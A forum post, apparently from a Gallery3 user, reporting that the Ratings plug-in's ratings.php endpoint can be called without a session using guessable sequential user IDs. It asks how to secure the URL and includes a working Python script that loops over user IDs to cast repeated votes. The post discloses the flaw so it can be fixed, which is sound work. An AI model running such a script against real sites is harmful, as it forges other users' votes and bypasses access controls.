module Ratings: accessible via URL for unauth. users

[Peter von Niederhäusern]

Hi,

How can URLs be secured, and only allowed to be called, if the user has a valid Gallery session? 

A plug-in used to vote for images uses an easily guessable sequence ID for each user, and thus, a user can vote for an image an unlimited number of times (bomb voting) using the script below.

Normally, the voting happens via the gallery3 web interface for logged-in users, and blocks multiple votes by the same user for the same image.

We use the Ratings module/plug-in: "Provides options for a sidebar block and under photo block for a ratings system<br>Inspired from and utilizing Michelle Steigerwalt's <a href="http://www.msteigerwalt.com/widgets/ratings/v1.5/">Rabid Ratings</a><br> | By J.E. Nash"

The following python script exploits the bug:

            #!/usr/bin/env python3

            

            import requests

            import json

            

            for i in range(415, 420):

                url = f"https://gallery-host/modules/ratings/vendor/ratings.php?modpath=/var/www/gallery3/modules/&varpath=/var/www/gallery3/var/&votestring=vote&i            mageword=star&userid={i}"

                headers = {

                    'Content-Type': 'application/x-www-form-urlencoded'

                }

            

                total_projects = 38000 # some default

                project_ids = []

                data = {

                    "vote": 100,

                    "id": 595 

                }

            

                resp = requests.post(url = url, headers=headers, data=data)

                retval = f"userid {i} => " + resp.text

                print(retval)